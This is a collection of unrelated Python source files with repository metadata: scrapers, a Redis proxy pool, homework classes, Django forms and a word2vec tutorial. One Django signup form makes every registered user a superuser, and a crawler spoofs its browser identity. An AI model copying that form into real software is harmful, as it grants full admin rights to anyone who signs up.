element = util.find_element_by_css_selector(driver, 'div.item-price > div > span.price > span.value')
if element:
text = element.text.strip().replace(',', '')
price = float(text) if text else 0
return price
def get_images(driver):
images = ''
texts = []
elements = util.find_elements_by_css_selector(driver, 'div.overlayElements > ul > li > img')
for element in elements:
# <img alt="VALENTINO GARAVANI UOMO MY0B0581RAU E41 Tote 手袋 U f" class="alternativeImageZoom" data-ytos-code10="45341239JA" data-ytos-image-shot="f" data-ytos-image-size="14_n" itemprop="image" sizes="100vw" srcset="https://media.yoox.biz/items/45/45341239ja_11_n_f.jpg 320w,https://media.yoox.biz/items/45/45341239ja_13_n_f.jpg 631w,https://media.yoox.biz/items/45/45341239ja_14_n_f.jpg 1570w">
code = element.get_attribute('data-ytos-code10').strip().lower()
shot = element.get_attribute('data-ytos-image-shot').strip().lower()
size = element.get_attribute('data-ytos-image-size').strip().lower()
texts.append('https://media.yoox.biz/items/45/' + code + '_' + size + '_' + shot + '.jpg')
images = ';'.join(texts)
return images
def parse(driver, url):
try:
driver.get(url)
except:
pass
good = {'brand':BRAND}
good['url'] = url
good['title'] = get_title(driver)
good['code'] = get_code(driver)
good['unit'] = 'RMB'
good['price'] = get_price(driver)
good['images'] = get_images(driver)
return good
def main():
driver = util.create_chrome_driver()
print(parse(driver, sys.argv[1]))
driver.quit()
if __name__ == '__main__':
main()
|
[
"linying_43151@163.com"
] |
linying_43151@163.com
|
0ff63d72300563a3b0e9143ed83bdb4c93fae7f2
|
24be9d9e10f8e0f4fa5d222811fd1ab5831d9f28
|
/serialization/homework4.py
|
277b677d20b56f732d44c746f342fbcf681d95ac
|
[] |
no_license
|
zulteg/python-course-alphabet
|
470149c3e4fd2e58bdde79a2908ffba1d7438dc1
|
dd2399f6f45c42c5847cf3967441a64bdb64a4cf
|
refs/heads/master
| 2020-05-14T21:25:02.627900
| 2019-09-17T10:19:51
| 2019-09-17T10:19:51
| 181,962,678
| 0
| 0
| null | 2019-06-20T08:39:27
| 2019-04-17T20:20:47
|
Python
|
UTF-8
|
Python
| false
| false
| 10,835
|
py
|
import uuid
from objects_and_classes.homework.constants import CARS_TYPES, CARS_PRODUCER, TOWNS
"""
Вам небхідно написати 3 класи. Колекціонери Гаражі та Автомобілі.
Звязкок наступний один колекціонер може мати багато гаражів.
В одному гаражі може знаходитися багато автомобілів.
"""
"""
Колекціонер має наступні характеристики
name - значення типу str. Його ім'я
garages - список з усіх гаражів які належать цьому Колекціонеру. Кількість гаражів за замовчуванням - 0
register_id - UUID; Унікальна айдішка Колекціонера.
Повинні бути реалізовані наступні методи:
hit_hat() - повертає ціну всіх його автомобілів.
garages_count() - вертає кількість гаріжів.
сars_count() - вертає кількість машиню
add_car() - додає машину у вибраний гараж. Якщо гараж не вказаний, то додає в гараж, де найбільше вільних місць.
Якщо вільних місць немає повинне вивести повідомлення про це.
Колекціонерів можна порівнювати за ціною всіх їх автомобілів.
"""
class Cesar:
def __init__(self, name=None, garages=None, register_id=None):
if not register_id:
self.register_id = uuid.uuid4()
else:
self.update_register_id(register_id)
try:
name = str(name)
except ValueError:
raise ValueError("Invalid name value")
self.name = name
self.garages = {}
if garages:
if not isinstance(garages, list):
raise ValueError("Invalid garages value, must be list of garages")
for garage in garages:
self.add_garage(garage)
def __str__(self):
return f"Cesar {self.name} has {self.garages_count()} garages with {self.cars_count()} cars " \
f"total cost of ${self.hit_hat()}. Register id: {self.register_id}."
def __lt__(self, other):
if not isinstance(other, Cesar):
raise TypeError("Unsupported compare instances")
return self.hit_hat() < other.hit_hat()
def __le__(self, other):
if not isinstance(other, Cesar):
raise TypeError("Unsupported compare instances")
return self.hit_hat() <= other.hit_hat()
def __gt__(self, other):
if not isinstance(other, Cesar):
raise TypeError("Unsupported compare instances")
return self.hit_hat() > other.hit_hat()
def __ge__(self, other):
if not isinstance(other, Cesar):
raise TypeError("Unsupported compare instances")
return self.hit_hat() >= other.hit_hat()
def __eq__(self, other):
if not isinstance(other, Cesar):
raise TypeError("Unsupported compare instances")
return self.hit_hat() == other.hit_hat()
def add_car(self, car, garage=None):
if not isinstance(car, Car):
raise TypeError("Invalid car instance")
if not garage:
garage = self._get_emptiest_garage()
if not garage:
print("There are no empty garages")
return False
else:
if not isinstance(garage, Garage):
raise TypeError("Invalid garage instance")
if garage.has_owner() and garage.owner != self.register_id:
print("This garage has other owner")
return False
self.add_garage(garage)
garage.add(car)
def add_garage(self, garage):
if not isinstance(garage, Garage):
raise TypeError("Invalid instance of garage")
if garage not in self.garages:
garage.set_owner(self.register_id)
self.garages[garage] = garage
def _get_emptiest_garage(self):
garage = None
if self.garages:
garage = max(self.garages, key=lambda g: g.places_count())
if garage.places_count() == 0:
garage = None
return garage
def garages_count(self):
return len(self.garages)
def cars_count(self):
return sum([garage.cars_count() for garage in self.garages])
def hit_hat(self):
return sum([garage.hit_hat() for garage in self.garages])
def update_register_id(self, register_id):
self.register_id = uuid.UUID(hex=str(register_id))
"""
Гараж має наступні характеристики:
town - одне з перечислениз значеннь в TOWNS
cars - список з усіх автомобілів які знаходяться в гаражі
places - значення типу int. Максимально допустима кількість автомобілів в гаражі
owner - значення типу UUID. За дефолтом None.
Повинен мати реалізованими наступні методи
add(car) -> Добавляє машину в гараж, якщо є вільні місця
remove(cat) -> Забирає машину з гаражу.
hit_hat() -> Вертає сумарну вартість всіх машин в гаражі
"""
class Garage:
def __init__(self, town, places, owner=None, cars=None):
if town not in TOWNS:
raise Exception("Invalid town value")
self.town = town
try:
self.places = int(places)
except ValueError:
raise ValueError("Invalid places value")
if not owner:
self.owner = None
else:
self.set_owner(owner=owner)
self.cars = {}
if cars:
if not isinstance(cars, list):
raise ValueError("Invalid cars value, must be list of cars")
for car in cars:
self.add(car)
def __str__(self):
return f"This garage is in {self.town}, has {len(self.cars)}/{self.places} places. " \
f"Car total price: {self.hit_hat()}. It owner: {self.owner}"
def set_owner(self, owner):
if isinstance(owner, Cesar):
self.owner = owner.register_id
else:
try:
self.owner = uuid.UUID(hex=str(owner))
except ValueError:
raise ValueError("Invalid owner value")
def add(self, car):
if not isinstance(car, Car):
raise TypeError("Invalid instance of car")
if car.number in self.cars:
# print("This car is already added to this garage")
return False
if self.places <= len(self.cars):
print("There are no empty places in this garage")
return False
if car.number not in self.cars:
self.cars[car.number] = car
def remove(self, car):
if not isinstance(car, Car):
raise TypeError("Invalid instance of car")
if car.number not in self.cars:
print("This car is not in this garage")
else:
self.cars.pop(car.number, None)
def hit_hat(self):
return sum([car.price for car in self.cars.values()]) if self.cars else 0
def cars_count(self):
return len(self.cars)
def places_count(self):
return self.places - self.cars_count()
def has_owner(self):
return True if self.owner else False
"""
Автомобіль має наступні характеристики:
price - значення типу float. Всі ціни за дефолтом в одній валюті.
type - одне з перечисленних значеннь з CARS_TYPES в docs.
producer - одне з перечисленних значеннь в CARS_PRODUCER.
number - значення типу UUID. Присвоюється автоматично при створенні автомобілю.
mileage - значення типу float. Пробіг автомобіля в кілометрах.
Автомобілі можна перівнювати між собою за ціною.
При виводі(logs, print) автомобілю повинні зазначатися всі його атрибути.
Автомобіль має метод заміни номеру.
номер повинен відповідати UUID
"""
class Car:
def __init__(self, price, car_type, producer, mileage, number=None):
if not number:
self.number = uuid.uuid4()
else:
self.update_number(number)
try:
self.price = float(price)
except ValueError:
raise ValueError("Invalid price value")
if car_type not in CARS_TYPES:
raise Exception("Invalid type value")
self.car_type = car_type
if producer not in CARS_PRODUCER:
raise Exception("Invalid producer value")
self.producer = producer
try:
self.mileage = float(mileage)
except ValueError:
raise ValueError("Invalid mileage value")
def __str__(self):
return f"This car {self.car_type} type has {self.mileage} mileage and produced by {self.producer}. " \
f"It price ${self.price}. Car number: {self.number}"
def __repr__(self):
return f"Car(price={self.price}, type='{self.car_type}', producer='{self.producer}', mileage={self.mileage}, " \
f"number='{self.number}')"
def __lt__(self, other):
if not isinstance(other, Car):
raise TypeError("Unsupported compare instances")
return self.price < other.price
def __le__(self, other):
if not isinstance(other, Car):
raise TypeError("Unsupported compare instances")
return self.price <= other.price
def __gt__(self, other):
if not isinstance(other, Car):
raise TypeError("Unsupported compare instances")
return self.price > other.price
def __ge__(self, other):
if not isinstance(other, Car):
raise TypeError("Unsupported compare instances")
return self.price >= other.price
def __eq__(self, other):
if not isinstance(other, Car):
raise TypeError("Unsupported compare instances")
return self.price == other.price
def update_number(self, number):
self.number = uuid.UUID(hex=str(number))
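

# --- Usage sketch added for illustration; the concrete values are assumptions
# and it relies on CARS_TYPES, CARS_PRODUCER and TOWNS being non-empty. ---
if __name__ == '__main__':
    car = Car(price=10000, car_type=list(CARS_TYPES)[0],
              producer=list(CARS_PRODUCER)[0], mileage=50000)
    garage = Garage(town=list(TOWNS)[0], places=2)
    cesar = Cesar(name='John', garages=[garage])
    cesar.add_car(car)          # goes to the garage with the most free places
    print(cesar.hit_hat())      # 10000.0 - total price of all cars
    print(cesar.cars_count())   # 1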
|
[
"zulteg@gmail.com"
] |
zulteg@gmail.com
|
facb9e2e327090fd6d8da5f7d8b5bd13b151d02f
|
24c7088effc63aa93682e16c99144b5649236905
|
/1. ZANPAX/Projeto1.py
|
f076feb3bd193ce36eb0e17daf1ac654b1d8ca41
|
[] |
no_license
|
FontesJ/HSM-AnaliseDeDados-Python
|
8885b01381b770004fd2e510825e21caa37ff463
|
910a19f67a88526f43d17620ae48492894c51bf9
|
refs/heads/master
| 2023-01-21T03:23:17.282799
| 2020-12-03T03:45:25
| 2020-12-03T03:45:25
| 283,621,522
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 96
|
py
|
valor_total = 56300
print('ISS: R$', (valor_total*0.04))
print('ICMS: R$', (valor_total*0.18))
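
# Expected output for valor_total = 56300 (added for reference):
# ISS: R$ 2252.0
# ICMS: R$ 10134.0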
|
[
"61214258+FontesJ@users.noreply.github.com"
] |
61214258+FontesJ@users.noreply.github.com
|
b1f59a5918d5f3fdfde7d110d73ff9c89f1ab8b0
|
859c2aa862ea03ac3088fca67fa1c47203dcd2f2
|
/api/proxy.py
|
aa99e2879329f54b43f3b4a64532667f05af6c5f
|
[
"MIT"
] |
permissive
|
linzhiming0826/ADSL
|
37932c6f45e6b36388750f160f0f47ce65346fae
|
b6ada0fd24da9716f0e413ee1254165f257d674d
|
refs/heads/master
| 2020-01-19T21:40:04.251505
| 2017-06-27T02:15:20
| 2017-06-27T02:15:20
| 94,221,675
| 6
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 884
|
py
|
# encoding:utf-8
import random
from config import REDIS_PROXY_KEY
from redis_db import RedisDB
class Proxy(object):
    @classmethod
    def get_proxy(cls, module):
        '''
        Get a proxy. For now only fetching from a single pool is implemented;
        extend as needed, e.g. to pick randomly across several pools.
        '''
        result = {'rt': '0', 'msg': 'not proxy', 'proxy': None}
        if module == 'one':
            keys = RedisDB.proxy().hkeys(REDIS_PROXY_KEY)
            if keys:
                key = random.choice(keys)
                proxy = RedisDB.proxy().hget(REDIS_PROXY_KEY, key)
                if proxy:
                    result = {'rt': '1', 'msg': 'success', 'proxy': proxy}
        return result

    @classmethod
    def add_proxy(cls, **kwargs):
        '''
        Register a proxy.
        '''
        RedisDB.proxy().hset(REDIS_PROXY_KEY, kwargs['key'], kwargs['value'])
        return {'rt': '1', 'msg': 'success'}
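

# --- Usage sketch added for illustration; it assumes a reachable Redis
# configured via redis_db/config, and the proxy value below is hypothetical. ---
if __name__ == '__main__':
    Proxy.add_proxy(key='adsl-01', value='http://10.0.0.1:8888')
    print(Proxy.get_proxy('one'))
    # e.g. {'rt': '1', 'msg': 'success', 'proxy': ...}
    # (the value type depends on the Redis client's decoding settings)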
|
[
"120549827@qq.com"
] |
120549827@qq.com
|
086c95b2ddfc5adc86d46719eb747e52c6f96648
|
b319377590343ca6b77355bc95fad40640b6acc1
|
/爬取CSDN的博文.py
|
e06a6fd938a36a9298a5bf66b5d78c4da931136f
|
[] |
no_license
|
1395724712/LESSON_2019_10
|
8b9dec5ef0b7e6a177bc3bf50779e810560aea31
|
104bf1318e7f083ecca776cfefe7f3009523dbe3
|
refs/heads/master
| 2020-08-28T09:36:37.076078
| 2019-11-08T08:10:59
| 2019-11-08T08:10:59
| 217,662,919
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,817
|
py
|
# coding="utf-8"
# 这个程序用于爬去CSDN的博文并写入txt文件中
# 注意伪装成浏览器
# 将爬取错误的网站报错到另一个txt文件中
#
import gzip
import urllib.request
import re
import urllib.error
# 首先创建报头
header=[('User-Agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36'),('Accept-encoding', 'gzip')]
# header=[('User-Agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36')]
opener=urllib.request.build_opener()
opener.addheaders=header
#将报头安装的全局
urllib.request.install_opener(opener)
# 目标网址
url="https://www.csdn.net/"
# 读取网页
# origin_page=opener.open(url).read().decode("utf-8","ignore")
# origin_page=urllib.request.urlopen(url).read().decode("utf-8","ignore")
origin_page=urllib.request.urlopen(url).read()
origin_page=gzip.decompress(origin_page).decode("UTF-8")
# 正则项
# pat="<a href=(.*?) target=\"_blank\" data-report-click='{"
pat="<a href=\"(.*?)\" target=\"_blank\"\n.*? data-report-click='{"
# 这里为什么不能用re.S,如果使用该项的话会导致它过分跨行,导致取到的表项过大
All_link=re.compile(pat).findall(origin_page)
# print(origin_page)
print(All_link)
# 新建报头
# header2=[('User-Agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36'),('Accept-encoding', 'gzip')]
# opener2=urllib.request.build_opener()
# opener2.addheaders=header2
# 打开存储出错信息的文件
fp_err=open("E:/Lesson_result/Error.txt","w")
# 新的正则项
# 标题
pat_1="<title>(.*?)</title>"
# 内容
pat_2="<p>(.*?)</p>"
n=0
# 逐项打开All_link
for i in All_link:
try:
origin_child_page=urllib.request.urlopen(i).read()
# origin_child_page=origin_child_page.rstrip('\n')
print(origin_child_page.rstrip("\n"))
except Exception as error:
# 如果出错则向错误记录文件输出错误记录
print(error.__context__)
fp_err.write(i+"\n")
if hasattr(error,"reason"):
fp_err.write(error.reason)
fp_err.write("\n")
else:
child_page=gzip.decompress(origin_child_page).decode("UTF-8")
# child_page=child_page.decode()
n=n+1
print(n)
# print(child_page)
Title=re.compile(pat_1).findall(child_page)
# 如果打开成功,则以博文的题目为文件名,写入文件内容
# 这个i是避免Title为空的情况
fp=open("E:/Lesson_result"+str(i)+Title[0],"a")
content=re.compile(pat_2).findall(child_page)
for j in content:
fp.write(j+"\n")
fp.close()
# 不能忘记关闭文件
fp_err.close()
|
[
"1395724712@qq.com"
] |
1395724712@qq.com
|
04b2c738fce0a61ab8d20b1dfe635a06d7022115
|
5d48aa758fe884ea8d2c3e458a4c59079b2a9f93
|
/administracao/forms/usuario_forms.py
|
22e4431bed32b035e91f8c069c27bcfd460c7f11
|
[] |
no_license
|
JSSILLES/Ediaristas
|
0ce3b2be758516a86fa7d57303aa3f396122d519
|
fbc5fefed8c6716c2e790f34c13ebbd62a64187e
|
refs/heads/main
| 2023-07-12T02:37:15.485571
| 2021-08-20T22:44:47
| 2021-08-20T22:44:47
| 394,742,770
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 753
|
py
|
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.contrib.auth import get_user_model
from django.forms.models import fields_for_model
class CadastroUsuarioForm(UserCreationForm):
class Meta:
model = get_user_model()
fields = ['username','first_name','email','password1','password2']
def save(self, commit=True):
user = super(UserCreationForm, self).save(commit=False)
user.is_superuser = True
user.set_password(self.cleaned_data['password1'])
if commit:
user.save()
return user
class EditarUsuarioForm(UserChangeForm):
password = None
class Meta:
model = get_user_model()
fields = ['username', 'first_name', 'email']
|
[
"jacqueline@gomara.tech"
] |
jacqueline@gomara.tech
|
ebc8310d4de429f0142a0a2b45c1ad58a75d5df8
|
79ad16a56df93085651886375920306e63121690
|
/tests/test_tutorial/test_connect/test_select/test_tutorial005.py
|
400c6483cbb307d2b153fa85489c98bbdf21684e
|
[
"MIT"
] |
permissive
|
macrosfirst/sqlmodel
|
4286f72144afbf1476368e3fd0ca895852799046
|
bda2e2818a3e7c2a18be4adf55bfea9bad83bfcc
|
refs/heads/main
| 2023-08-14T02:09:27.072625
| 2021-09-29T13:31:54
| 2021-09-29T13:31:54
| 403,592,064
| 0
| 0
|
MIT
| 2021-09-29T13:31:55
| 2021-09-06T11:11:59
|
Python
|
UTF-8
|
Python
| false
| false
| 1,418
|
py
|
from unittest.mock import patch
from sqlmodel import create_engine
from ....conftest import get_testing_print_function
expected_calls = [
[
"Created hero:",
{
"age": None,
"id": 1,
"secret_name": "Dive Wilson",
"team_id": 2,
"name": "Deadpond",
},
],
[
"Created hero:",
{
"age": 48,
"id": 2,
"secret_name": "Tommy Sharp",
"team_id": 1,
"name": "Rusty-Man",
},
],
[
"Created hero:",
{
"age": None,
"id": 3,
"secret_name": "Pedro Parqueador",
"team_id": None,
"name": "Spider-Boy",
},
],
[
"Preventer Hero:",
{
"age": 48,
"id": 2,
"secret_name": "Tommy Sharp",
"team_id": 1,
"name": "Rusty-Man",
},
"Team:",
{"id": 1, "name": "Preventers", "headquarters": "Sharp Tower"},
],
]
def test_tutorial(clear_sqlmodel):
from docs_src.tutorial.connect.select import tutorial005 as mod
mod.sqlite_url = "sqlite://"
mod.engine = create_engine(mod.sqlite_url)
calls = []
new_print = get_testing_print_function(calls)
with patch("builtins.print", new=new_print):
mod.main()
assert calls == expected_calls
|
[
"tiangolo@gmail.com"
] |
tiangolo@gmail.com
|
802060315660180fe6727d974e97580ddcaaf943
|
76e9267b7391fd3ee58e9fbaa2bea418cff910aa
|
/Desktop/auth/gg/ch1/blog/admin.py
|
8d9c8e2ee1f4ec19f812b3f045f6b8ecd05a4c6a
|
[] |
no_license
|
yoongyo/auth1
|
bd1b89a4733c1f20bae6274107cb0e886e98d0d6
|
aab569ed4473c2d431949bcaf72b71e003cc69a5
|
refs/heads/master
| 2020-03-23T04:43:06.627491
| 2018-07-16T06:22:42
| 2018-07-16T06:22:42
| 141,101,167
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 222
|
py
|
from django.contrib import admin
from .models import Post
class PostAdmin(admin.ModelAdmin):
list_display = ['id', 'title']
list_display_links = ['title']
search_fields = ['title']
admin.site.register(Post)
|
[
"jyg017@naver.com"
] |
jyg017@naver.com
|
d7c1ecaebb7212d893e273afcfb56bf1ca0a8853
|
1e2c05dfa2abf5a16cb75a68bc42d70256fccc6b
|
/infos/migrations/0001_initial.py
|
58c6044c8d8693c7955d098cbec4ca2d50f40a27
|
[
"MIT",
"CC-BY-SA-4.0"
] |
permissive
|
acdh-oeaw/apis-core
|
b491011a30226d0682be045517bee08c6af71bbd
|
508545fa5119e1895801cc02c33b62ee33518183
|
refs/heads/main
| 2023-09-01T03:04:19.622371
| 2023-05-17T14:21:48
| 2023-05-17T14:21:48
| 96,198,214
| 14
| 5
|
MIT
| 2023-06-12T12:40:21
| 2017-07-04T09:04:29
|
Python
|
UTF-8
|
Python
| false
| false
| 3,487
|
py
|
# Generated by Django 2.1.12 on 2019-09-30 11:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AboutTheProject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(blank=True, max_length=300, verbose_name="Project's Title")),
('subtitle', models.CharField(blank=True, max_length=300, verbose_name="Project's Sub Title")),
('description', models.TextField(blank=True, verbose_name='Project Description')),
('author', models.CharField(blank=True, help_text='The names of the Agents responsible for this description', max_length=250, verbose_name='Authors')),
('github', models.CharField(blank=True, help_text="Link to the application's source code", max_length=250, verbose_name='Code Repo')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'About the Project',
'ordering': ['id'],
},
),
migrations.CreateModel(
name='ProjectInst',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=300, verbose_name='Name')),
('abbr', models.CharField(blank=True, max_length=300, verbose_name='Abbreviation')),
('description', models.TextField(blank=True, verbose_name='Short description of the Institution')),
('website', models.URLField(blank=True, max_length=300, verbose_name="Link to the Institution's website")),
('logo_url', models.URLField(blank=True, max_length=300, verbose_name="Link to the Insitution's Logo")),
                ('norm_url', models.URLField(blank=True, help_text='URL to any normdata record of the institution', max_length=300, verbose_name='Norm Data URL (ORCID, GND, VIAF, ...)')),
],
options={
'verbose_name': 'Institution involved in the Project',
'ordering': ['name'],
},
),
migrations.CreateModel(
name='TeamMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=300, verbose_name='Name')),
('description', models.TextField(blank=True, verbose_name='Short description of the Person')),
('website', models.URLField(blank=True, max_length=300, verbose_name="Link to the person's website")),
('role', models.CharField(blank=True, help_text='will be used to group the team member', max_length=300, verbose_name="The person's role in the project")),
                ('norm_url', models.URLField(blank=True, help_text='URL to any normdata record of the person', max_length=300, verbose_name='Norm Data URL (ORCID, GND, VIAF, ...)')),
],
options={
'verbose_name': 'Team Member',
'ordering': ['role', 'name'],
},
),
]
|
[
"m.schloegl@gmail.com"
] |
m.schloegl@gmail.com
|
dff21f390e678ffda8152453571a65ce260214f4
|
1f9c18ac3725513458321b80abd0bcf5d572d696
|
/python-ml/word2vec_basic.py
|
15fc4b9f7efc63606579c7a767fb59812ab0442b
|
[] |
no_license
|
CMEI-BD/ml
|
34270572adba16132011b16a8965c0c2f2327161
|
1d5b43bf63aa234b4dbe9563d30fae91a485d7a2
|
refs/heads/master
| 2020-03-19T07:28:27.530808
| 2018-06-05T09:01:52
| 2018-06-05T09:01:52
| 136,116,805
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,880
|
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 4 15:27:13 2018
@author: meicanhua
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
import os
import random
import zipfile
import numpy as np
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
# Step 1: Download the data.
url = 'http://mattmahoney.net/dc/'
def maybe_download(filename, expected_bytes):
"""Download a file if not present, and make sure it's the right size."""
if not os.path.exists(filename):
filename, _ = urllib.request.urlretrieve(url + filename, filename)
statinfo = os.stat(filename)
if statinfo.st_size == expected_bytes:
print('Found and verified', filename)
else:
print(statinfo.st_size)
raise Exception(
'Failed to verify ' + filename + '. Can you get to it with a browser?')
return filename
filename = maybe_download('text8.zip', 31344016)
# Read the data into a list of strings.
def read_data(filename):
"""Extract the first file enclosed in a zip file as a list of words."""
with zipfile.ZipFile(filename) as f:
data = tf.compat.as_str(f.read(f.namelist()[0])).split()
return data
vocabulary = read_data(filename)
print('Data size', len(vocabulary))
# Step 2: Build the dictionary and replace rare words with UNK token.
vocabulary_size = 50000
def build_dataset(words, n_words):
"""Process raw inputs into a dataset."""
count = [['UNK', -1]]
count.extend(collections.Counter(words).most_common(n_words - 1))
dictionary = dict()
for word, _ in count:
dictionary[word] = len(dictionary)
data = list()
unk_count = 0
for word in words:
if word in dictionary:
index = dictionary[word]
else:
index = 0 # dictionary['UNK']
unk_count += 1
data.append(index)
count[0][1] = unk_count
reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys()))
return data, count, dictionary, reversed_dictionary
data, count, dictionary, reverse_dictionary = build_dataset(vocabulary,
vocabulary_size)
del vocabulary # Hint to reduce memory.
print('Most common words (+UNK)', count[:5])
print('Sample data', data[:10], [reverse_dictionary[i] for i in data[:10]])
data_index = 0
# Step 3: Function to generate a training batch for the skip-gram model.
def generate_batch(batch_size, num_skips, skip_window):
global data_index
assert batch_size % num_skips == 0
assert num_skips <= 2 * skip_window
batch = np.ndarray(shape=(batch_size), dtype=np.int32)
labels = np.ndarray(shape=(batch_size, 1), dtype=np.int32)
span = 2 * skip_window + 1 # [ skip_window target skip_window ]
buffer = collections.deque(maxlen=span)
for _ in range(span):
buffer.append(data[data_index])
data_index = (data_index + 1) % len(data)
for i in range(batch_size // num_skips):
target = skip_window # target label at the center of the buffer
targets_to_avoid = [skip_window]
for j in range(num_skips):
while target in targets_to_avoid:
target = random.randint(0, span - 1)
targets_to_avoid.append(target)
batch[i * num_skips + j] = buffer[skip_window]
labels[i * num_skips + j, 0] = buffer[target]
buffer.append(data[data_index])
data_index = (data_index + 1) % len(data)
# Backtrack a little bit to avoid skipping words in the end of a batch
data_index = (data_index + len(data) - span) % len(data)
return batch, labels
batch, labels = generate_batch(batch_size=8, num_skips=2, skip_window=1)
for i in range(8):
print(batch[i], reverse_dictionary[batch[i]],
'->', labels[i, 0], reverse_dictionary[labels[i, 0]])
# Step 4: Build and train a skip-gram model.
batch_size = 128
embedding_size = 128 # Dimension of the embedding vector.
skip_window = 1 # How many words to consider left and right.
num_skips = 2 # How many times to reuse an input to generate a label.
# We pick a random validation set to sample nearest neighbors. Here we limit the
# validation samples to the words that have a low numeric ID, which by
# construction are also the most frequent.
valid_size = 16 # Random set of words to evaluate similarity on.
valid_window = 100 # Only pick dev samples in the head of the distribution.
valid_examples = np.random.choice(valid_window, valid_size, replace=False)
num_sampled = 64 # Number of negative examples to sample.
graph = tf.Graph()
with graph.as_default():
# Input data.
train_inputs = tf.placeholder(tf.int32, shape=[batch_size])
train_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])
valid_dataset = tf.constant(valid_examples, dtype=tf.int32)
# Ops and variables pinned to the CPU because of missing GPU implementation
with tf.device('/cpu:0'):
# Look up embeddings for inputs.
embeddings = tf.Variable(
tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0))
embed = tf.nn.embedding_lookup(embeddings, train_inputs)
# Construct the variables for the NCE loss
nce_weights = tf.Variable(
tf.truncated_normal([vocabulary_size, embedding_size],
stddev=1.0 / math.sqrt(embedding_size)))
nce_biases = tf.Variable(tf.zeros([vocabulary_size]))
# Compute the average NCE loss for the batch.
# tf.nce_loss automatically draws a new sample of the negative labels each
# time we evaluate the loss.
loss = tf.reduce_mean(
tf.nn.nce_loss(weights=nce_weights,
biases=nce_biases,
labels=train_labels,
inputs=embed,
num_sampled=num_sampled,
num_classes=vocabulary_size))
# Construct the SGD optimizer using a learning rate of 1.0.
optimizer = tf.train.GradientDescentOptimizer(1.0).minimize(loss)
# Compute the cosine similarity between minibatch examples and all embeddings.
norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))
normalized_embeddings = embeddings / norm
valid_embeddings = tf.nn.embedding_lookup(
normalized_embeddings, valid_dataset)
similarity = tf.matmul(
valid_embeddings, normalized_embeddings, transpose_b=True)
# Add variable initializer.
init = tf.global_variables_initializer()
# Step 5: Begin training.
num_steps = 10  # reduced from 100001 for a quick test run
with tf.Session(graph=graph) as session:
# We must initialize all variables before we use them.
init.run()
print('Initialized')
average_loss = 0
for step in xrange(num_steps):
batch_inputs, batch_labels = generate_batch(
batch_size, num_skips, skip_window)
feed_dict = {train_inputs: batch_inputs, train_labels: batch_labels}
        # We perform one update step by evaluating the optimizer op (including
        # it in the list of returned values for session.run())
_, loss_val = session.run([optimizer, loss], feed_dict=feed_dict)
average_loss += loss_val
if step % 2000 == 0:
if step > 0:
average_loss /= 2000
# The average loss is an estimate of the loss over the last 2000 batches.
print('Average loss at step ', step, ': ', average_loss)
average_loss = 0
# Note that this is expensive (~20% slowdown if computed every 500 steps)
if step % 10000 == 0:
sim = similarity.eval()
for i in xrange(valid_size):
valid_word = reverse_dictionary[valid_examples[i]]
top_k = 8 # number of nearest neighbors
nearest = (-sim[i, :]).argsort()[1:top_k + 1]
log_str = 'Nearest to %s:' % valid_word
for k in xrange(top_k):
close_word = reverse_dictionary[nearest[k]]
log_str = '%s %s,' % (log_str, close_word)
print(log_str)
final_embeddings = normalized_embeddings.eval()
# Step 6: Visualize the embeddings.
def plot_with_labels(low_dim_embs, labels, filename='tsne.png'):
assert low_dim_embs.shape[0] >= len(labels), 'More labels than embeddings'
plt.figure(figsize=(18, 18)) # in inches
for i, label in enumerate(labels):
x, y = low_dim_embs[i, :]
plt.scatter(x, y)
plt.annotate(label,
xy=(x, y),
xytext=(5, 2),
textcoords='offset points',
ha='right',
va='bottom')
plt.savefig(filename)
try:
# pylint: disable=g-import-not-at-top
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne = TSNE(perplexity=30, n_components=2, init='pca', n_iter=5000)
plot_only = 500
low_dim_embs = tsne.fit_transform(final_embeddings[:plot_only, :])
labels = [reverse_dictionary[i] for i in xrange(plot_only)]
plot_with_labels(low_dim_embs, labels)
except ImportError:
print('Please install sklearn, matplotlib, and scipy to show embeddings.')
|
[
"meicanhua@didichuxing.com"
] |
meicanhua@didichuxing.com
|
adf46f01ac43eb7680ef244d505c63a64f5e6a98
|
1c4393200a17da79c2f059df7c4fd2dc5f4c3bb3
|
/evovrp/main.py
|
fd45e8e173210faa374ab19282df77bbcefac482
|
[
"MIT"
] |
permissive
|
bsmdev/evovrp
|
4a0f232c5f816de9cc51e023f78e2d64ad92712c
|
16d85d1035019ec9b16d096415423a65b546bd88
|
refs/heads/master
| 2020-12-29T04:35:25.024612
| 2019-06-19T15:01:08
| 2019-06-19T15:01:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
